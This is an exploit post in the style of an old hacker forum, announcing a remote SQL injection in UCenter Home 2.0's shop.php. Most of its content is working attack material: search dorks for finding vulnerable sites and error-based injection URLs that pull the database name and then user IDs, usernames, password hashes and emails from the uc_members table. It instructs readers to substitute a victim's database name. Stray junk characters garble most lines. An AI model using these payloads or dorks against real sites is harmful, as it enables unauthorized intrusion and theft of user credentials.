* {9 T% g# M/ n6 N: W: D) k
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
- D- s$ P! K5 l& Z* U$ |. }* ~: o+ h* {
4 f2 ~ S4 u+ r+ [
& v$ @2 E7 I6 j: T: b: j* g; j*/ Author : KnocKout
. v/ P& G9 ]1 z8 z. f4 v! M$ {. B8 K
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
# @* v+ o5 `0 J0 R
3 |" E" G2 t$ ~" F U& [, J5 T J$ X*/ Contact: knockoutr@msn.com & Y) v; e; }6 k; E- h; L
g5 \3 M( c9 W" z- b9 C*/ Cyber-Warrior.org/CWKnocKout ( ]; }# f8 S& R: [3 L; C: J8 y
$ I! j( x# w% u6 m. ^/ T0 j( j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
! |3 t6 g& N$ g* \& n. T4 P
% c& P$ a" L* T' W, r! ~0 PScript : UCenter Home 2 s( X2 m) B" ^0 ^, v& z
4 m! W+ q( [6 Z) c9 M7 f. kVersion : 2.0
- K& R$ y, O" u" H0 O" d5 R- \4 o% R/ ^
Script HomePage : http://u.discuz.net/
8 ?& J/ G& ] K* ~ k! x" b( k
& b5 o2 w3 z3 D$ `; h# m__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
* ]( `1 A' d% S$ e2 }4 f. D
; P% H8 A0 A( S4 E2 ADork : Powered by UCenter inurl:shop.php?ac=view 9 [, i) ?! b O
* z" k5 i' y' @) O n
Dork 2 : inurl:shop.php?ac=view&shopid= 2 K/ {2 v' ] [+ i) P k! r
{0 Z- E/ N z" S: m! L__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== - _' |. M$ N6 z% g" L4 E/ b. q
! \' ]8 Y5 G0 L$ M6 rVuln file : Shop.php ; |' D6 \( P0 Y" ^* z
2 M0 ^- P5 | _
value's : (?)ac=view&shopid=
2 B! z6 h) H; N* O) I
! z. `; B$ a: DVulnerable Style : SQL Injection (MySQL Error Based) + b/ X, Q" q/ [, U/ ^. [
N6 t$ l! Y- e/ x" j' M
Need Metarials : Hex Conversion ! R) \3 v) y7 n( D2 |
2 C5 h% S; K0 c; D, q' l# ~
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
. ?9 ]# a# Y3 o
; G8 G& n+ i& i6 h6 TYour Need victim Database name.
6 q& v9 ]* R8 ^* A6 o4 y s) g9 |0 f4 V* ?
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
( G4 J- E" Q# a3 n6 O: p# j& O/ K6 i% }
.. ' P2 _6 L- y- L( W* B- w1 @
6 ? |* [0 i# ]8 A+ H& c, `DB : Okey. ' P& P, G W* i4 h, C8 f) d
' [9 r5 v# C& I) V
your edit DB `[TARGET DB NAME]`
" M3 I* B; F8 J9 F* \$ i! G: ]
# ?& X, B3 e7 j# s4 IExample : 'hiwir1_ucenter'
& J p: U4 p' i3 {. G% z% {& k
& V* B2 q/ f4 M& {9 `3 HEdit : Okey. $ _+ W8 y: |( P! M3 ^
! Z. _% V! m5 C$ nYour use Hex conversion. And edit Your SQL Injection Exploit.. 3 j9 N1 l0 r! |4 d4 @- s
4 x% a; J9 R3 ~; j* J2 Q 9 D8 X) g, }' @! d9 T: g
. l- e* d6 q0 }* b( X/ AExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
* I p. a \( L5 @ |